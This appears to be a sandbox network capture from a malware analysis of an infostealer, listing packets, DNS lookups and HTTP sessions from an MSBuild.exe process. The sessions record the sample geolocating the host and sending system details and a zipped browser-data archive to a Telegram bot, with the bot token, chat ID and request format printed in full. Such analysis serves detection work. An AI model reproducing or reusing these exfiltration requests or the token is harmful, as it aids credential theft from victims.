Jul 1, 2024 09:19:32.140549898 CEST	49724	80	192.168.2.8	104.16.185.241
Jul 1, 2024 09:19:32.146555901 CEST	80	49724	104.16.185.241	192.168.2.8
Jul 1, 2024 09:19:32.146641970 CEST	49724	80	192.168.2.8	104.16.185.241
Jul 1, 2024 09:19:32.147814035 CEST	49726	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.147846937 CEST	443	49726	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.148014069 CEST	49726	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.148371935 CEST	49726	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.148387909 CEST	443	49726	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.770211935 CEST	443	49726	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.770278931 CEST	49726	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.772078991 CEST	49726	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.772085905 CEST	443	49726	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.772326946 CEST	443	49726	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.773657084 CEST	49726	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.773678064 CEST	443	49726	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.949862003 CEST	443	49726	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.949928045 CEST	443	49726	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.949986935 CEST	49726	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.955584049 CEST	49726	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.965702057 CEST	49727	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.965725899 CEST	443	49727	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:32.965775967 CEST	49727	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.966067076 CEST	49727	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:32.966075897 CEST	443	49727	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:33.664604902 CEST	443	49727	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:33.666318893 CEST	49727	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:33.666342020 CEST	443	49727	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:33.983190060 CEST	443	49727	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:33.983269930 CEST	443	49727	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:33.983599901 CEST	49727	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:33.983884096 CEST	49727	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:34.100503922 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:34.100555897 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:34.100774050 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:34.102147102 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:34.102163076 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:34.949254990 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:34.951375961 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:34.951448917 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.259727955 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.263622046 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.263709068 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.264544010 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.264559984 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.264812946 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.264862061 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265005112 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265043020 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265244961 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265281916 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265427113 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265453100 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265481949 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265496969 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265552998 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265578985 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265593052 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265609980 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265640020 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265657902 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265687943 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265687943 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.265707016 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.265727997 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.944020033 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.944243908 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.944804907 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.944840908 CEST	443	49728	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:35.944864035 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.945390940 CEST	49728	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:35.952795982 CEST	49729	443	192.168.2.8	104.20.3.235
Jul 1, 2024 09:19:35.952843904 CEST	443	49729	104.20.3.235	192.168.2.8
Jul 1, 2024 09:19:35.952917099 CEST	49729	443	192.168.2.8	104.20.3.235
Jul 1, 2024 09:19:35.953289986 CEST	49729	443	192.168.2.8	104.20.3.235
Jul 1, 2024 09:19:35.953303099 CEST	443	49729	104.20.3.235	192.168.2.8
Jul 1, 2024 09:19:36.442250013 CEST	443	49729	104.20.3.235	192.168.2.8
Jul 1, 2024 09:19:36.442312002 CEST	49729	443	192.168.2.8	104.20.3.235
Jul 1, 2024 09:19:36.444088936 CEST	49729	443	192.168.2.8	104.20.3.235
Jul 1, 2024 09:19:36.444099903 CEST	443	49729	104.20.3.235	192.168.2.8
Jul 1, 2024 09:19:36.444437981 CEST	443	49729	104.20.3.235	192.168.2.8
Jul 1, 2024 09:19:36.445787907 CEST	49729	443	192.168.2.8	104.20.3.235
Jul 1, 2024 09:19:36.492503881 CEST	443	49729	104.20.3.235	192.168.2.8
Jul 1, 2024 09:19:36.979300022 CEST	443	49729	104.20.3.235	192.168.2.8
Jul 1, 2024 09:19:36.979418039 CEST	443	49729	104.20.3.235	192.168.2.8
Jul 1, 2024 09:19:36.979476929 CEST	49729	443	192.168.2.8	104.20.3.235
Jul 1, 2024 09:19:36.979973078 CEST	49729	443	192.168.2.8	104.20.3.235
Jul 1, 2024 09:19:36.981426001 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:36.981463909 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:36.981643915 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:36.981916904 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:36.981928110 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.654459953 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.656208038 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.656234026 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.973195076 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.973702908 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.973718882 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.973788023 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.973793983 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.973876953 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.973897934 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.974114895 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.974124908 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.974211931 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.974293947 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.974615097 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.974632978 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.974694967 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.974709034 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.974741936 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.974751949 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.974808931 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.974817038 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.974905014 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.974915028 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.974936962 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.974942923 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:37.975037098 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:37.984816074 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:38.482475042 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:38.482585907 CEST	443	49730	149.154.167.220	192.168.2.8
Jul 1, 2024 09:19:38.482867002 CEST	49730	443	192.168.2.8	149.154.167.220
Jul 1, 2024 09:19:38.484728098 CEST	49730	443	192.168.2.8	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 09:18:03.774008036 CEST	61037	53	192.168.2.8	1.1.1.1
Jul 1, 2024 09:18:03.785589933 CEST	53	61037	1.1.1.1	192.168.2.8
Jul 1, 2024 09:19:29.833754063 CEST	53035	53	192.168.2.8	1.1.1.1
Jul 1, 2024 09:19:29.842142105 CEST	53	53035	1.1.1.1	192.168.2.8
Jul 1, 2024 09:19:29.881136894 CEST	52786	53	192.168.2.8	1.1.1.1
Jul 1, 2024 09:19:29.887969971 CEST	53	52786	1.1.1.1	192.168.2.8
Jul 1, 2024 09:19:30.429748058 CEST	59278	53	192.168.2.8	1.1.1.1
Jul 1, 2024 09:19:30.437882900 CEST	53	59278	1.1.1.1	192.168.2.8
Jul 1, 2024 09:19:32.140265942 CEST	50172	53	192.168.2.8	1.1.1.1
Jul 1, 2024 09:19:32.147012949 CEST	53	50172	1.1.1.1	192.168.2.8
Jul 1, 2024 09:19:35.945527077 CEST	54149	53	192.168.2.8	1.1.1.1
Jul 1, 2024 09:19:35.952251911 CEST	53	54149	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 1, 2024 09:18:03.774008036 CEST	192.168.2.8	1.1.1.1	0x850c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:29.833754063 CEST	192.168.2.8	1.1.1.1	0x4150	Standard query (0)	13.169.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 1, 2024 09:19:29.881136894 CEST	192.168.2.8	1.1.1.1	0x6ba1	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:30.429748058 CEST	192.168.2.8	1.1.1.1	0x2f45	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:32.140265942 CEST	192.168.2.8	1.1.1.1	0xaf35	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:35.945527077 CEST	192.168.2.8	1.1.1.1	0xe7c8	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 1, 2024 09:18:03.785589933 CEST	1.1.1.1	192.168.2.8	0x850c	No error (0)	www.google.com		216.58.206.68	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:18:22.000170946 CEST	1.1.1.1	192.168.2.8	0x21a4	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:18:22.000170946 CEST	1.1.1.1	192.168.2.8	0x21a4	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:18:22.096080065 CEST	1.1.1.1	192.168.2.8	0xe72c	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 09:18:22.096080065 CEST	1.1.1.1	192.168.2.8	0xe72c	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:18:22.137824059 CEST	1.1.1.1	192.168.2.8	0x5b25	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 09:18:22.137824059 CEST	1.1.1.1	192.168.2.8	0x5b25	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:18:53.294344902 CEST	1.1.1.1	192.168.2.8	0xb511	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:18:53.294344902 CEST	1.1.1.1	192.168.2.8	0xb511	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:22.528000116 CEST	1.1.1.1	192.168.2.8	0xb351	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:22.528000116 CEST	1.1.1.1	192.168.2.8	0xb351	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:29.842142105 CEST	1.1.1.1	192.168.2.8	0x4150	Name error (3)	13.169.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 1, 2024 09:19:29.887969971 CEST	1.1.1.1	192.168.2.8	0x6ba1	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:29.887969971 CEST	1.1.1.1	192.168.2.8	0x6ba1	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:30.437882900 CEST	1.1.1.1	192.168.2.8	0x2f45	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:30.437882900 CEST	1.1.1.1	192.168.2.8	0x2f45	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:32.147012949 CEST	1.1.1.1	192.168.2.8	0xaf35	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:35.952251911 CEST	1.1.1.1	192.168.2.8	0xe7c8	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:35.952251911 CEST	1.1.1.1	192.168.2.8	0xe7c8	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:19:35.952251911 CEST	1.1.1.1	192.168.2.8	0xe7c8	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.mylnikov.org

api.telegram.org

pastebin.com

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49724	104.16.185.241	80	8040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 09:19:29.897967100 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jul 1, 2024 09:19:30.379568100 CEST	534	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:19:30 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=XfrJi0jabKifMLVRlm7GKoQlYApo5y3pjW9vdj3ulmw-1719818370-1.0.1.1-J0BXq4EJEZK8N63n2QItx7uFSoEJ6JFA5WWD_dtcrmz__jBKPWJHb.GHnOBSMBA4tDqf0FPv2J04mLvge7m.PQ; path=/; expires=Mon, 01-Jul-24 07:49:30 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 89c4a0ce8b30c335-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49725	104.21.44.66	443	8040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:19:30 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-07-01 07:19:32 UTC	781	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:19:32 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Mon, 01 Jul 2024 07:19:32 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smvu%2FcgzinF3Vq0xfwf2mMDME6GDHvgVwXmtxZ7PTOD2CbiNa%2BIehN90G800KcM60lsNC2oxwhFBuXYtKLShiud2KZxqv%2FG1Y9cBqdBCopVlbXUYE%2B3ha8kSuAjUkwB8iqvd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 89c4a0d2cb6742af-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:19:32 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 31 39 38 31 38 33 37 31 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1719818371}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49726	149.154.167.220	443	8040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:19:32 UTC	1676	OUT	GET /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-01%203:19:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20960781%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20B3BZ8W6Y%0ARAM:%204095MB%0AHWID:%20B4D18CF796%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No% [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-07-01 07:19:32 UTC	347	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Mon, 01 Jul 2024 07:19:32 GMT Content-Type: application/json Content-Length: 137 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-01 07:19:32 UTC	137	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 38 39 37 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 897"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49727	149.154.167.220	443	8040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:19:33 UTC	171	OUT	GET /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-07-01 07:19:33 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 01 Jul 2024 07:19:33 GMT Content-Type: application/json Content-Length: 322 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-01 07:19:33 UTC	322	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 32 32 39 31 37 31 38 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 72 76 65 6c 73 74 65 61 6c 65 72 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 58 6d 61 72 76 65 6c 73 74 65 61 6c 65 72 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 36 33 35 30 34 37 32 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 61 6d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 6c 75 67 20 5c 75 64 38 33 64 5c 75 64 64 30 63 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 70 61 6d 70 6c 75 67 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d Data Ascii: {"ok":true,"result":{"message_id":35,"from":{"id":7322917184,"is_bot":true,"first_name":"Xmarvelstealerbot","username":"Xmarvelstealerbot"},"chat":{"id":5635047295,"first_name":"Spam","last_name":"Plug \ud83d\udd0c","username":"spamplug","type":"private"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49728	149.154.167.220	443	8040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:19:34 UTC	254	OUT	POST /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendDocument?chat_id=5635047295 HTTP/1.1 Content-Type: multipart/form-data; boundary="382cb4b8-21f0-4694-ab9c-8df98334f9dd" Host: api.telegram.org Content-Length: 188508 Expect: 100-continue
2024-07-01 07:19:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-01 07:19:35 UTC	40	OUT	Data Raw: 2d 2d 33 38 32 63 62 34 62 38 2d 32 31 66 30 2d 34 36 39 34 2d 61 62 39 63 2d 38 64 66 39 38 33 33 34 66 39 64 64 0d 0a Data Ascii: --382cb4b8-21f0-4694-ab9c-8df98334f9dd
2024-07-01 07:19:35 UTC	269	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 68 75 62 65 72 74 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 34 66 35 36 32 38 38 64 66 62 63 39 61 35 61 66 31 35 39 34 37 65 37 62 38 33 35 35 38 39 61 38 5c 68 75 62 65 72 74 40 39 36 30 37 38 31 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 68 75 62 65 72 74 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 34 66 35 36 32 38 38 64 66 62 63 39 61 35 61 66 31 35 39 34 37 65 37 62 38 33 35 35 38 39 61 38 25 35 43 68 75 62 65 72 74 25 34 30 39 36 30 37 38 31 Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C4f56288dfbc9a5af15947e7b835589a8%5Cuser%40960781
2024-07-01 07:19:35 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 d1 44 e1 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 d1 44 e1 58 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 6b 1a e1 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 6b 1a e1 58 ba b9 27 3b 7e 01 00 00 35 04 00 00 17 00 00 00 44 Data Ascii: PKDXBrowsers\Edge\PKDXBrowsers\Google\PKkXQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKkX';~5D
